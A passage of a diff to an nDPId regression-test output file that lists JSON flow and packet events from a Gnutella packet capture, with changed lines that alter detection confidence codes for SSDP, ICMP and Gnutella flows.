Dangerous","category":"Download"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":28681,"dst_port":14339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":28681,"dst_port":14339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.222.160","src_port":28681,"dst_port":56121,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3876,7 +3876,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":520019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":520019,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LsAAAER3F4KAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7131,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":2,"flow_last_seen":521048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":521048,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LwAAAER3F0KAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7141,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":3,"flow_last_seen":522076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":522076,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4L0AAAER3FwKAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":355387,"flow_last_seen":355387,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":536329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.125.218.84","src_port":28681,"dst_port":17561,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3904,7 +3904,7 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7398,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":551892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":551892,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3oAAIARnW8KAAIPKfk\/yHAJWDYAIF+oR05EEECHAQFUC1FLUlAGUk5BXS\/iNQlw"} 00528{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":552011,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":552011,"pkt":"CAAn5uVZUlQAEjUCCABFwABQEicAAH8BV+OaAyrRCgACDwMDzhEAAAAARQAANH78AAB\/EevZCgACD5oDKtFwCRjKACBD\/UdORBBAiwEBVAtRS1JQBlJOQV0v4jUJcA=="} -00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.209868} +00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.209868} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":371839,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3915,24 +3915,24 @@ 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7429,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251734,"flow_last_seen":381404,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":568531,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"129.45.47.167","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7429,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251734,"flow_last_seen":381404,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":568531,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"129.45.47.167","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":400872,"flow_last_seen":400901,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":399168,"flow_last_seen":399265,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7447,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":591044,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":400872,"flow_last_seen":400901,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":399168,"flow_last_seen":399265,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7447,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":591044,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":595449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":595449,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4L8AAAQR2X8KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":2,"flow_last_seen":598465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":598465,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4MAAAAQR2X4KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":2,"flow_last_seen":599325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":599325,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP8AAIARA\/wKAAIPCgAC\/wCKAIoA0XlAEQKcMQoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATVNFREdFV0lOMTAAAAAAAAoAARAAAA8BVaoA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":599415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599415,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvQnllPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOjk4Zjc0ZjcxLTZkZmMtNDYxMi05YzNjLTVjNTgwZWI4MzU5Njwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjUiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkJ5ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDo3NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTg8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOkJ5ZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} 